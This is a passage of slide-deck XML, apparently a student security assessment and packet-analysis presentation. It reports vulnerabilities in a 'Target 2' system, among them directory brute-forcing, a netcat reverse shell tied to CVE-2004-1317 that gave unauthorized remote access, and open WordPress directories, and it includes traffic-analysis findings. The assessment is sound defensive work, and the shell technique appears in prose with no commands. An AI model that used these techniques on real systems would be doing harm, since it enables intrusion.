              <a:t>http://www.assoc-amazon.com/s/ads.js</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-445928" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web searches for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://www.iphonehacks.com/jailbreak-ios-13</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="13716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10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Watching Youtube</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="579" name="Google Shape;579;p7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80" name="Google Shape;580;p7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581" name="Google Shape;581;p74"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1575600"/>
            <a:ext cx="20276226" cy="11141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Shopping online</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="588" name="Google Shape;588;p7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89" name="Google Shape;589;p75"/>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590" name="Google Shape;590;p75"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="773400" y="1787650"/>
            <a:ext cx="22990876" cy="10551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Installing desktop wallpapers</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="597" name="Google Shape;597;p7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98" name="Google Shape;598;p7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599" name="Google Shape;599;p76"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1979825" y="1683725"/>
            <a:ext cx="19464426" cy="1153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Critical Vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Target 2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150" name="Google Shape;150;p2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51" name="Google Shape;151;p23"/>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rgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Our assessment uncovered the following critical </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Target 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:srgbClr val="000000"/>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 name="Google Shape;152;p23"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1311638" y="3243050"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{962B4CB7-2BE8-4553-86C2-8896E5BEEF5F}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7331875"/>
                <a:gridCol w="7331875"/>
                <a:gridCol w="7331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3100">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Brute -forceable URL directories and files</a:t>
                      </a:r>
                      <a:endParaRPr sz="31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3100">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>This vulnerability allows for brute force guessing of which directories a system has.</a:t>
                      </a:r>
                      <a:endParaRPr sz="3100">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr sz="31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100">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>By discovering the directories of a system, this gives away the structure of the system. </a:t>
                      </a:r>
                      <a:endParaRPr sz="31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3100">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Netcat reverse shell/remote</a:t>
                      </a:r>
                      <a:endParaRPr sz="3100">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3100">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>execution vulnerability</a:t>
                      </a:r>
                      <a:endParaRPr sz="3100">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3100">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>/CVE-2004-1317</a:t>
                      </a:r>
                      <a:endParaRPr sz="31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100">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Combining a bash script, a netcat</a:t>
                      </a:r>
                      <a:endParaRPr sz="3100">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3100">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>listener, and the web browser</a:t>
                      </a:r>
                      <a:endParaRPr sz="3100">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3100">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>access of the system,</a:t>
                      </a:r>
                      <a:endParaRPr sz="3100">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3100">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>implementing a reverse shell was</a:t>
                      </a:r>
                      <a:endParaRPr sz="3100">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3100">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>possible.</a:t>
                      </a:r>
                      <a:endParaRPr sz="3100">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr sz="31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100">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>The reverse shell gave</a:t>
                      </a:r>
                      <a:endParaRPr sz="3100">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3100">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>unauthorized remote access to the</a:t>
                      </a:r>
                      <a:endParaRPr sz="3100">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3100">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>system.</a:t>
                      </a:r>
                      <a:endParaRPr sz="31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3100">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Unrestricted access to wordpress directories </a:t>
                      </a:r>
                      <a:endParaRPr sz="31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100">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Once on the system there was no restricted access to the files or directories. </a:t>
                      </a:r>
                      <a:endParaRPr sz="31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100">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>This completely exposed the system and all of its directories and files to anyone who happened to gain authorized or unauthorized access.</a:t>
                      </a:r>
                      <a:endParaRPr sz="31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DHCP Request</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="606" name="Google Shape;606;p7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607" name="Google Shape;607;p7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608" name="Google Shape;608;p77"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1575600"/>
            <a:ext cx="22246124" cy="4418400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="609" name="Google Shape;609;p77"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="6146400"/>
            <a:ext cx="22246124" cy="590873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Downloading files</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="616" name="Google Shape;616;p7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617" name="Google Shape;617;p78"/>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618" name="Google Shape;618;p78"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1575600"/>
            <a:ext cx="21625251" cy="11060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Torrent Application Download -Interesting File</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="625" name="Google Shape;625;p7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fontScale="25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="3200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="626" name="Google Shape;626;p7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627" name="Google Shape;627;p7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628" name="Google Shape;628;p79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467" y="3424667"/>
            <a:ext cx="24377700" cy="9551100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="2437975" lIns="1219000" spcFirstLastPara="1" rIns="1219000" wrap="square" tIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="13716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1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="629" name="Google Shape;629;p79"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3024000" y="1585701"/>
            <a:ext cx="16929000" cy="11915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HTTP Post Request Method - Interesting Traffic</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="636" name="Google Shape;636;p80"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1802600"/>
            <a:ext cx="24377700" cy="972900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="1219000" spcFirstLastPara="1" rIns="1219000" wrap="square" tIns="243750">
            <a:normAutofit fontScale="25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="11200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A POST request method using secure HTTP connection</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="11200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="3200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="637" name="Google Shape;637;p8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638" name="Google Shape;638;p80"/>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639" name="Google Shape;639;p80"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="478" y="3424675"/>
            <a:ext cx="7478400" cy="9659100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="2437975" lIns="1219000" spcFirstLastPara="1" rIns="1219000" wrap="square" tIns="0">
            <a:normAutofit fontScale="77500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-356552" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What kind of traffic did you observe? Which protocol(s)?</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-356552" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The warning indicates an Unencrypted HTTP protocol detected over encrypted port, could indicate a dangerous configuration.</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-356552" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The POST request is using a secure HTTP protocol TCP Port 443.</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-356552" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>There are multiple traffic found on the same request. </a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-356552" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What, specifically, was the user doing? Which site were they browsing? Etc.</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-356552" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://31.7.62.214/fakeurl.htm</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
